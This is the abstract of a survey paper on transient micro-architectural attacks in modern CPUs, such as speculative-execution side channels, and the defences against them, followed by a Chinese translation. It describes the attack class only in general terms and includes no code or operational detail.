In the last two decades, the evolving cyber-threat landscape has brought to center stage the contentious tradeoffs between the security and performance of modern microprocessors. The guarantees provided by the hardware to ensure no violation of process boundaries have been shown to be breached in several real-world scenarios. While modern CPU features such as superscalar, out-of-order, simultaneous multi-threading, and speculative execution play a critical role in boosting system performance, they are central for a potent class of security attacks termed transient micro-architectural attacks. These attacks leverage shared hardware resources in the CPU that are used during speculative and out-of-order execution to steal sensitive information. Researchers have used these attacks to read data from the Operating Systems (OS) and Trusted Execution Environments (TEE) and to even break hardware-enforced isolation. Over the years, several variants of transient micro-architectural attacks have been developed. While each variant differs in the shared hardware resource used, the underlying attack follows a similar strategy. This paper presents a panoramic view of security concerns in modern CPUs, focusing on the mechanisms of these attacks and providing a classification of the variants. Further, we discuss state-of-the-art defense mechanisms towards mitigating these attacks.

翻译：在过去的二十年里，不断演变的网络威胁格局使得现代微处理器安全与性能之间的争议性权衡成为焦点。硬件为保证进程边界不被违反而提供的保障机制，在多个真实场景中被证实已遭到破坏。尽管超标量、乱序执行、同步多线程以及推测执行等现代CPU特性在提升系统性能方面发挥着关键作用，但它们也构成了一类被称为瞬态微架构攻击的强大安全攻击的核心。这类攻击利用CPU在推测执行和乱序执行期间所使用的共享硬件资源来窃取敏感信息。研究人员已利用这些攻击读取来自操作系统（OS）和可信执行环境（TEE）的数据，甚至突破了硬件强制隔离机制。多年来，多种瞬态微架构攻击变体已被开发出来。虽然每种变体所使用的共享硬件资源不同，但底层攻击遵循相似的策略。本文全景式地审视了现代CPU中的安全问题，聚焦于这些攻击的机制，并对其变体进行了分类。此外，我们还讨论了用于缓解这些攻击的最前沿防御机制。